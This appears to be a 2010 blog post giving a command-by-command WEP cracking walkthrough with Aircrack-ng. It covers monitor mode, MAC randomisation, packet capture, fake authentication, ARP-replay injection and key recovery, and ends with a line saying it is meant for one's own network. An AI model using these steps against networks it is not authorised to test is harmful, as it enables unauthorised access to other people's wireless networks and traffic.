MOA

Security & Administration

Thursday, May 6, 2010

- [ WEP key recovery ] -

Things needed for this:
Aircrack-ng ( http://www.aircrack-ng.org/ )
A wireless adapter with packet injection capability.

airmon-ng
airmon-ng stop ‘interface’
macchanger -r ‘interface’
airmon-ng start ‘interface’

airodump-ng ‘interface’
airodump-ng -c ‘channel’ –bssid ‘bssidnr’ -w ‘file output’ ‘interface’

aireplay-ng -1 0 a ‘bssid’ -h ‘your mac adress’ -e ‘essid’ ‘interface’
aireplay-ng -3 -b ‘bssid’ -h ‘your mac adress’ ‘interface’

// Make sure to get around 20-40 thousand packets before you crack the code.

aircrack-ng -b ‘bssid’ ‘file output’















should look something like this when your done.

PS.
This is ment for your own WEP. Dont attack other people.

No comments:

Post a Comment